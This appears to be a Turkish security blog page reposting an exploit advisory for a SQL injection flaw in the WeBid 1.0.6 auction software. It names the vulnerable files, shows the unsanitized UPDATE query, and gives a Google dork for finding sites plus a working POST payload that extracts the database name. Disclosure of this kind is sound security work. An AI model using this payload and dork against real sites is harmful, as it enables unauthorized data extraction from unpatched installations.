Tag Archive for WeBid 1.0.6 SQL injection Açığı

WeBid 1.0.6 SQL Injection Vulnerability

WeBid 1.0.6 versiyonunda SQL injection açığı bulunmuş olup açık bulucunun açık hakkında açıklamaları ve açığın bulunduğu yere ilişkin bildirimi.

 # Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability
# Google Dork: "Powered by WeBid"
# Date: 1/9/13
# Exploit Author: Life Wasted
# Vendor Homepage: http://www.webidsupport.com/
# Version: Tested on 1.0.6, but could affect other version
# Tested On: Linux, Windows

Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202 and 234 in the includes/functions_fees.php file

Proof of Concept:
validate.php?toocheckout=asdf calls the toocheckout_validate() function
toocheckout_validate() takes unsanitized post input from 2 different parameters (total and cart_order_id)
toocheckout_validate() calls callback_process() if the post parameter credit_card_processed is equal to 'Y'
The unsanitized parameters are using in an UPDATE query:
$query = "UPDATE " . $DBPrefix . "users SET balance = balance + " . $payment_amount . $addquery . " WHERE id = " . $custom_id;
This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query.

For example, the attacker could send the following post data to extract the name of the current database.

http://site.com/validate.php?toocheckout=asdf
POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database())

The resulting query would be:
UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attackers User ID*

Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page